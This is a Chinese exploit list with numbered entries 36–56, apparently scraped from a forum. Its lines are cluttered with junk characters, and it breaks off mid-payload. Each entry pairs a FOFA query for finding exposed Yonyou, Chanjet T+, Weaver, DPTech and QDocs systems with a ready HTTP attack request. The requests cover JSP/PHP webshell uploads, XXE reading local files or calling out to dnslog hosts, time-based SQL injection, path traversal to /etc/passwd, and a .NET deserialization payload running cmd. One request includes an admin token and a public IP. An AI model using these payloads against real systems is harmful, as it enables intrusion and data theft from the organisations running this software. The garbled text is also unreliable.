POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1) g, e2 q- O0 N+ C
Host: 203.25.218.166:8888
/ g% s9 V6 `' b# g7 T# CUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info* Z1 y: q7 O8 a- h
Accept-Encoding: gzip, deflate d3 }% B1 b1 G' D( ?) {! d& w' m
Accept: */*+ `, ^- b: n% O+ L2 L/ }
Connection: close, i6 \- X' O, x/ U7 G* [
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
# M9 v- \* K% a8 \3 h3 kContent-Length: 190
1 p% y: s5 C, L6 H. O5 dContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0: M2 a7 v* a. e: p) i
8 s: t/ ^) I; [5 S--fd28cb44e829ed1c197ec3bc71748df0$ B7 \3 E6 ?; ?# b M- n2 F, G ?& Y
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"/ B4 n3 E7 `9 f/ G
4 F. a2 \& t" F6 G8 N z6 t2 D<%out.println(1111*1111);%>
: [: I; H- ?2 r--fd28cb44e829ed1c197ec3bc71748df0--
( T4 \% a' D: _, H6 `3 j
y- a+ {7 j2 R3 p7 @# _' H( O0 x' U; i
36. 用友NC-Cloud soapFormat XXE
/ n& Z4 s" ?. Z; W- rFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
2 I! k! h; h' i w& m& KPOST /uapws/soapFormat.ajax HTTP/1.1
" i& N; _+ n! m7 ^5 y/ N) h6 \Host: 192.168.40.130:8989: [2 O$ c; k2 M" d1 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0+ j4 x8 B1 S7 s$ [: ^* t0 d, J: @
Content-Length: 263
* |& ^6 m+ N7 s9 ^/ nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 Z% L' C( @9 j1 x6 p9 RAccept-Encoding: gzip, deflate; k" ~9 n/ x* f" R1 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ~2 l7 j% j1 x( j% x2 C' h
Connection: close6 W2 A( Y+ ^+ H Y
Content-Type: application/x-www-form-urlencoded# }" E/ {7 w$ M
Upgrade-Insecure-Requests: 1
$ \' ^9 M: |. t1 a: a2 A
{2 ^. ^9 d# J5 J/ imsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a* n* C. }7 f% O, `0 M# K' c' _% C( c
. f1 H* h p! F4 w, Y3 B Q* X0 E) c0 h9 `; F. O
37. 用友NC-Cloud IUpdateService XXE
/ y/ @* Z) V! ~8 T4 Z# KFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"' ]$ y9 [2 }- r7 ?% {7 y" h& ]
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
2 y2 A( [. J, S* p3 AHost: 192.168.40.130:8989
: \' E% V! p1 i' B3 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36' R( i+ Y0 G( Q
Content-Length: 421
- f, |* H; d) v" G- [2 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" x6 @5 C, C+ q# m8 T5 c0 TAccept-Encoding: gzip, deflate
' V% f1 v/ |! x2 x* pAccept-Language: zh-CN,zh;q=0.9" ~5 L g. J9 @$ e
Connection: close
% F8 ]: P; S4 D! Q0 M( K4 ?Content-Type: text/xml;charset=UTF-8
; ]' Y3 V: P3 nSOAPAction: urn:getResult, [& ^( n: J& T k2 _+ a! S
Upgrade-Insecure-Requests: 17 p2 T, |* u! I3 P7 R( I
% J$ H' X+ g$ s6 V5 ~ p
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">: }1 k) [: r; V8 X9 ^' h4 q
<soapenv:Header/>+ y0 S* d* O4 n& P
<soapenv:Body>/ P& I" H* `5 u
<iup:getResult>& M2 j& K U# ]
<!--type: string-->
) W9 b$ I* D3 ~' S2 A<iup:string><![CDATA[6 \" D) P7 K) ?2 T1 J$ n. G
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
/ G( ?5 r: w% ~8 w) T, ?& K" y<xxx/>]]></iup:string>
/ W4 h& U2 l b: \</iup:getResult>7 h" @5 |1 z) y- X
</soapenv:Body>" l' r, y g: n" W
</soapenv:Envelope>0 d5 W' V5 x( Y1 {) `" D: y
/ g0 F k! j! Q# H
1 p" z7 ?! t* u P" f( K# W- x. R" g+ I1 @. K& Z9 H- g
38. 用友U8 Cloud smartweb2.RPC.d XXE- f; D1 `/ w: B! V! _, z! ~
FOFA:app="用友-U8-Cloud"; P+ ]- ]" g. p5 K
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
5 G9 h6 J4 [3 I6 N# PHost: 192.168.40.131:8088$ g: a6 m$ n O3 I y6 I# S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25+ |3 e% G; |+ d, |
Content-Length: 260
?/ ]( f4 r2 m* x8 k% Y5 e8 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b39 R4 {' L( O+ t" [+ C% X# a
Accept-Encoding: gzip, deflate# J! j4 P5 E" o& c
Accept-Language: zh-CN,zh;q=0.9
) T0 v" G9 y, bConnection: close9 \+ H% j9 p1 Z% g0 m6 s
Content-Type: application/x-www-form-urlencoded! p2 z6 ^! x# {8 U1 O% _
! s# w$ c9 ^* @
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
' |- ~' i) K/ t4 x
* G0 M4 n3 T9 A$ l; C
$ c L; C- @+ \0 h9 A% t39. 用友U8 Cloud RegisterServlet SQL注入
" X$ {/ M/ t0 a* @8 h9 IFOFA:title="u8c"
6 d1 o' e0 V, s# e+ k3 UPOST /servlet/RegisterServlet HTTP/1.1
! ^; b! U8 r2 Y; jHost: 192.168.86.128:80891 p l' H% _5 v$ S8 c* o9 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36; M4 S8 A* c2 i) t0 P
Connection: close
/ k8 s/ X* ]0 |% M' aContent-Length: 85
! t) C, O% j. F" T1 Q& H- AAccept: */*
6 e5 j; m+ k! m/ Y1 XAccept-Language: en5 B. D5 N1 d! H( B# H) D
Content-Type: application/x-www-form-urlencoded: y) i; d0 U$ a
X-Forwarded-For: 127.0.0.1
* a8 S- U6 P: p4 dAccept-Encoding: gzip
' \$ S2 n1 b: J6 O8 B U4 M3 P. o# D% E1 m. `* l0 g
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+ @8 k# T/ i D k# h3 A" P2 c/ k! H) R; N, k' S& J
& f4 {" B! V% l8 |/ n! F; K
40. 用友U8-Cloud XChangeServlet XXE
2 Z2 {; g* {2 d2 _2 S* lFOFA:app="用友-U8-Cloud"' g" e7 \) x" l
POST /service/XChangeServlet HTTP/1.1
( b# H7 n& x" L( G8 T) lHost: x.x.x.x! E1 j3 H! T) }/ e! L
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, n1 r8 l( e& e1 B
Content-Type: text/xml L' o: E. L3 n4 e
Connection: close
$ |+ w; i. H' w3 M' c1 Q; Y M+ f
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! q. y0 q) T1 t9 o4 w n8 n! l& v" P: K3 `' x" u
^0 z& R t# H7 Y& }
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
: i% N1 @8 _8 r: [. @FOFA:app="用友-U8-Cloud"
+ ` G% D/ f2 x y& G: q1 o6 XGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.13 B6 u* }1 u0 \/ V
Host:
8 Y* K: Q5 x7 D/ n4 d% \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 R! m& I0 A {9 K( e7 f) |Content-Type: application/json
' b# H% q7 |4 ^) s6 I+ OAccept-Encoding: gzip
4 u# ]4 Z: y) n! U4 ?5 XConnection: close" h! Y' ~% A y0 h
b: C0 l( m4 C0 j c
& x, H/ v* Y; I: Z9 F42. 用友GRP-U8 SmartUpload01 文件上传$ j/ F" ? }5 ~8 H% f
FOFA:app="用友-GRP-U8"
" t @( |4 N$ s/ X; oPOST /u8qx/SmartUpload01.jsp HTTP/1.14 U! U7 g7 y+ L! ~- L" N. K M/ }
Host: x.x.x.x
+ ?7 V* w; Y4 x" |' X& n, R. X9 ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
, B: P% [! H4 q2 A0 G- G/ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36* q( x5 t; l6 u" C: S4 N6 C3 S
3 \: F) o! L `9 ]0 [/ U+ V n# [
PAYLOAD
, t, u/ I2 G j, ]
* z( c; b1 `8 K3 @: \) f
" A" j8 E$ O6 G2 `http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
2 q, O* L8 f1 d! h, F f' z* n/ P( U; i9 ?, P
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
H- H- V9 \2 iFOFA:app="用友-GRP-U8"
4 v& N2 G3 e1 N# o. K6 ]POST /services/userInfoWeb HTTP/1.1( Y7 N+ C4 L8 D: T' Z+ q. f! m9 n( Y
Host: your-ip6 n r: Z8 }$ M- E$ d1 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; ?* @. i) C9 Q8 @$ l8 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ f* w. [3 A) o _/ K
Accept-Encoding: gzip, deflate" H# _7 P# @. c/ A3 e* H
Accept-Language: zh-CN,zh;q=0.95 g1 E. s u \; y1 j5 o2 K1 |
Connection: close
* e2 E0 \5 g1 [/ A ?+ ]SOAPAction:$ F& G( J% T# K% o# V1 a
Content-Type: text/xml;charset=UTF-8
( ]: f& s5 @+ t0 R/ k: {2 R L
" m7 Z( } P |. v0 m; h' [7 f% N<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">$ @1 k9 |) D; _- Y. e# z7 _* N' C
<soapenv:Header/>
& J% n/ k: J N" g <soapenv:Body>% G; {$ S6 n" g3 D0 t
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
/ z C' ~% P. Z% s( u% ^( { <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>6 h( b: H0 K: A- K7 \- l, J! k* n- E
</ser:getUserNameById>
1 T9 M3 [: C) Q% J </soapenv:Body>
0 e) m% f# q5 t</soapenv:Envelope># }4 Y4 A; y' B1 w3 ~# I3 Y; ?# k5 {
1 p v5 W# l- ?/ h+ h7 `# k7 B0 G4 t9 T8 H, T8 h) E6 @3 H
44. 用友GRP-U8 bx_dj_check.jsp SQL注入5 L: o* n2 B! T' a) i4 h
FOFA:app="用友-GRP-U8"
* Q# z! W3 Q) y8 c" X$ v9 `# P" NGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1" I" S: I9 o* U( j
Host: your-ip; A/ q0 I: q2 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36% r* v/ @5 o* ^4 W" o' f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) s/ O! p. L' s& _
Accept-Encoding: gzip, deflate
+ s& X& K8 Q+ y4 @6 ]Accept-Language: zh-CN,zh;q=0.9
, Z% k& l9 B# ?* O7 TConnection: close8 x: Z* k" f, |6 s
: d5 u% f( r( x$ r
- z6 t) N& g+ _0 }0 N3 S
45. 用友GRP-U8 ufgovbank XXE
5 e7 d! o4 [- G6 I. W7 ]* SFOFA:app="用友-GRP-U8"0 m3 ]7 U% g8 @
POST /ufgovbank HTTP/1.1
/ Q/ h% d5 ]3 rHost: 192.168.40.130:222
1 X7 @8 B- k( q) }5 r) H5 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
" ?# k% f8 n# c8 j. {+ dConnection: close! c( n6 U1 s5 G7 ~
Content-Length: 161, y K5 P* H( A% _2 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 ~, c- B6 k7 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ D( Z/ u" H# S# v
Content-Type: application/x-www-form-urlencoded/ ?( R3 u6 ?$ x9 E' F
Accept-Encoding: gzip
8 @) C/ ?7 l& i. `$ M9 i7 {/ n, M( E/ @$ k1 j- f! ~1 V; N9 u
reqData=<?xml version="1.0"?> h( A. ]4 S* y; H
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest3 r" d' _* f8 m! q e. N. T# ?
6 Z+ f- O; D$ _% s9 c* ~ F( w
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
" m1 t2 R4 H' ~6 K0 g8 lFOFA:app="用友-GRP-U8"
4 S' n& t& l6 WGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.11 J- P. ?. S- L) [5 ? I
Host: your-ip
\* F* u% b. }+ c2 Q1 \9 s6 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
4 Y1 J |' x8 e+ F) k* }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 J* e4 F6 Z7 O% S1 C, F% S
Accept-Encoding: gzip, deflate
. G, B+ ~$ C! U: d/ wAccept-Language: zh-CN,zh;q=0.9
1 w) j8 s5 O* b/ ~! Y4 m7 MConnection: close
+ E( S5 O9 q7 x* v+ ?" G% k4 c$ m) D* y' y
" j7 X' d" V% I2 F' H. X9 O6 V9 f
47. 用友GRP A++Cloud 政府财务云 任意文件读取
& D0 y ^% {8 p/ L7 q JFOFA:body="/pf/portal/login/css/fonts/style.css"
" ]3 _2 l- C# f9 v2 PGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
2 D: ~9 o( I+ YHost: x.x.x.x0 p; Y2 F( q9 D2 `' s
Cache-Control: max-age=0. X( ~' r, @) I6 H
Upgrade-Insecure-Requests: 1* w% z" f- b8 p1 ~. |4 F {$ j& S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% Y* N* f) a2 Q ], C8 H7 F l6 f% f( NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( q1 ^6 l0 ], s3 l
Accept-Encoding: gzip, deflate, br
/ h/ v) _1 O* Q6 L( f# EAccept-Language: zh-CN,zh;q=0.98 h0 t0 I( j. r& u% M
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
" _& r" v' |& YConnection: close
( ]1 j- T2 _5 q$ e# w
$ u$ T. S9 Z9 L! C1 |6 G o
" m: J5 b( B- A. f# `
Z0 e5 M- m1 K6 B48. 用友U8 CRM swfupload 任意文件上传5 t' R( u* {. \+ |# x7 M
FOFA:title="用友U8CRM"
3 v1 X/ Z: A% e: h T* T& T& kPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.10 I. t S3 W! v
Host: your-ip" D, R2 D& b. l1 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! [% G4 Q, _! ]' I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ w6 {( p) {0 V# p: Q9 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. i$ ^; h) l1 d2 a* a! _; kAccept-Encoding: gzip, deflate5 z1 l; K8 P6 F- ]( H
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668551 Z2 s* C, S' O8 R) [
------2695209672394068716424300668555 P1 N5 d: S9 ?, B5 m. v# |
Content-Disposition: form-data; name="file"; filename="s.php"% n4 W" }$ w. j3 }
1231
% V5 X7 J, O- u- qContent-Type: application/octet-stream
6 H; D" R- W" q+ H------269520967239406871642430066855
' H: d) A' J2 t( Q, Y fContent-Disposition: form-data; name="upload"1 V4 L7 @1 Z1 C. @
upload
) l+ f h9 ?9 k7 D" D y. i' g------269520967239406871642430066855--
' [9 h8 P; P9 ]4 n
; g( n8 w$ H4 ^; |+ I( E% F ?3 S" S6 t# g
49. 用友U8 CRM系统uploadfile.php接口任意文件上传* X7 K0 a' ]: \. Z. |
FOFA:body="用友U8CRM"
+ Q% b' ^ r2 T1 }8 O U5 @+ ~ q8 T
9 x/ \! h, |$ P0 wPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
j* H1 I, b! }" MHost: x.x.x.x
: a, t; E2 z" ~; p9 G; L: V; g+ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 u' R& T& y5 W3 Q( h
Content-Length: 329% V; c! x5 b4 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% l" ^ L; J( ]# C6 FAccept-Encoding: gzip, deflate
4 a" `' ^) x M" h( j* b; K( oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ p4 M. x" S$ i! n- y K/ vConnection: close
* {" b; {; T2 b$ A/ `4 _Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
8 `" [7 e% ^% x/ ?1 E6 z h: a d# E- B! l3 v* H a5 r
-----------------------------vvv3wdayqv3yppdxvn3w3 a, m: p8 R0 S" {% h1 o' M, y4 Z
Content-Disposition: form-data; name="file"; filename="%s.php "
' z6 E( K6 }* f0 Y" |Content-Type: application/octet-stream1 A% ?# v& P- v8 }1 M+ a
6 T$ ^8 ^3 k9 M% [, T! b9 Hwersqqmlumloqa/ b, b4 k% r( X3 L7 H
-----------------------------vvv3wdayqv3yppdxvn3w8 i: @# ^0 q5 e' g
Content-Disposition: form-data; name="upload"; z$ d) M) D8 V5 R K9 q: J7 }0 ^8 b3 S
3 d( \# F' N" ]. U0 R% fupload
% D, i! l1 l; J-----------------------------vvv3wdayqv3yppdxvn3w--# a/ `' B2 c! a1 B+ m. P2 g
" x2 A2 Q% R$ { ^, [
7 A/ g: t: p! a- d) o* \
http://x.x.x.x/tmpfile/updB3CB.tmp.php
2 {1 l: L2 a) p4 `( g2 A
T9 B* u% f( G2 w& b, j) M1 p- B50. QDocs Smart School 6.4.1 filterRecords SQL注入
( c2 `+ K3 f; B+ V" T) T: tFOFA:body="close closebtnmodal"+ t3 T2 I7 z& h8 j. K' t
POST /course/filterRecords/ HTTP/1.1; M9 t* Q9 Y4 v8 n
Host: x.x.x.x: b. S, `/ F% _$ Y( \0 |& y0 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ u4 i6 r7 {3 m& e: RConnection: close* T8 L! l8 d+ F5 G& |9 [! u
Content-Length: 224: G2 j% S, k, N8 g7 H- H
Accept: */*
+ s! V9 h( x5 Q, h' E- J; AAccept-Language: en$ s; z, ]( U* n% O
Content-Type: application/x-www-form-urlencoded( a. j$ z h. E% D& U# v* G0 C& W
Accept-Encoding: gzip
8 [( O4 q& M( ~$ T; t n
- o# ~) _% U; P* x, q/ Lsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1( s3 S( [8 v" h% \3 t. o
- z. b! m" L1 Q- ?7 H/ w+ _6 x* ?& s; _0 F) ?; u A
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* `5 m/ f0 m1 S( z
FOFA:app="云时空社会化商业ERP系统"
" _3 {7 C9 B5 g/ @' iGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1: ^0 w$ q3 r" l0 ^9 n i
Host: your-ip- m) M& m* k! Z+ M/ g4 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 E4 J8 q2 N# p( m% C* N, K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 \7 J2 V) T3 M3 c/ {
Accept-Encoding: gzip, deflate
5 C" c4 U" i% g/ iAccept-Language: zh-CN,zh;q=0.9
2 t- p. l& f: ]) aConnection: close
- T5 ?7 k) [% l( ~1 Q0 L7 c6 ~
1 F# E7 B" G" N- Q) J2 U2 Q* T+ K7 _; S
52. 泛微E-Office json_common.php sql注入4 m- U# x# e6 m6 m, y% q: z
FOFA:app="泛微-EOffice"
2 k! U9 J$ q- v8 x5 c( OPOST /building/json_common.php HTTP/1.1
) a* h; A7 A" Y) s8 i xHost: 192.168.86.128:8097
& J7 H9 \4 }' _: N }User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
e3 T- k% }: jConnection: close
, O7 R8 o& R kContent-Length: 874 w7 f, Q0 j. j& @
Accept: */*
: S& R( L0 g, u# c; oAccept-Language: en
( l. b8 n( {- G& k: i; g4 e2 w6 ]Content-Type: application/x-www-form-urlencoded
: G% S2 [% P$ R% _+ {: [Accept-Encoding: gzip- ?3 Y( E9 _3 B( y4 B V0 f
F" ~% u& y1 B5 t v5 Z
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333( N$ ~/ c$ z: r- i( J0 m9 A4 a0 @( e
+ g) ]+ T& p$ S8 V% d6 O+ P+ F4 R8 {9 l) P' l9 U7 L
53. 迪普 DPTech VPN Service 任意文件上传
' H: U3 M$ `5 d% F% e, VFOFA:app="DPtech-SSLVPN"
- W0 Z7 W$ c, g" Z' r' z$ ^/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd0 ~, K* x9 O7 c
- B% {3 B' h$ M- H, A# {% x
: _/ m& F8 l& t2 ]0 I: i54. 畅捷通T+ getstorewarehousebystore 远程代码执行$ p: B% I5 d5 `: ?: n4 t
FOFA:app="畅捷通-TPlus"6 L! u- b1 B2 g0 H( W* v' c. o
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
; s& z4 F! t5 r7 T"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: @* n1 R1 H- Q s- S0 O/ z' ?) X6 f' ^2 `7 I% o' P8 `) J' b
) A4 J D5 R% [/ r$ {3 m& G完整数据包% z- g1 H7 p# a
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& ~7 w7 @) B1 P3 d: gHost: x.x.x.x
* s! K: u; t! a3 ?User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
5 Y- L3 |2 I4 e1 cContent-Length: 593& z) I ]; V2 _1 @/ B; f9 q: d" N
, n2 K/ O5 ]' T5 n$ l) F. h
{
6 B& m2 K& A1 E: A"storeID":{
- H0 ?& \4 B3 I; r. D2 e% s "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",) W/ j/ G# E, }2 g" S! x
"MethodName":"Start",
* |. K4 l; I) ]4 c "ObjectInstance":{
+ l4 M [2 T# f6 n$ D9 m7 ^1 ?( m "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ a# r1 G8 E# r; u/ C( @( I8 S "StartInfo":{( K8 g* f5 E# G
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) r5 N4 ]3 k! ]& v3 x( B, \
"FileName":"cmd",
+ v" [8 E9 R, W# R+ p "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 [7 U* {8 B0 N1 x' p0 C2 o3 m
}
8 B% M" t( ^' b) ` }; ^' Z% |8 ]; _) [, q
}
x$ X8 L! D' D' `. j+ F' }}
y& R8 a2 O2 b5 L
0 a# T- q. H( S3 l
/ `5 [2 {% U$ Z* n1 ~第二步,访问如下url' Z1 n8 Z3 a; ~. r
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt( H' }2 S8 H Z! }' ` g
8 y0 L8 ?3 e3 D1 j# ?( ~7 |* ~: Q2 U" e# t& S @5 D v1 M
55. 畅捷通T+ getdecallusers信息泄露/ ? h: i* i- N" `9 G l7 [
FOFA:app="畅捷通-TPlus"
5 Y1 \) K3 D) |' y第一步,通过
- J" ]. _8 j: z4 w/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie' H) v$ _6 ?& {, i! A) P3 W& [
第二步,利用获取到的Cookie请求
& y, O" n3 F$ |. i+ [+ u* E. I/ u/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
% s( n" b0 T t C# Y+ h! c
' z9 f* C5 ]! }! o, Y56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE* R k, y1 N1 A8 O
FOFA: app="畅捷通-TPlus"9 g7 `1 s( b$ A% I, H
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1/ \1 u0 @6 ]0 {% t4 m6 p! Y' `
Host: x.x.x.x
& z6 B. m8 F# S6 v) s& k6 r' o* FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' v2 Z$ U1 F4 b8 `! d. R3 s7 q
Content-Type: application/json
3 d$ x: r s9 B8 X9 }/ Y4 v5 h( {8 V& L5 @3 G
{
a3 q- |: s/ s! P5 u "storeID":{
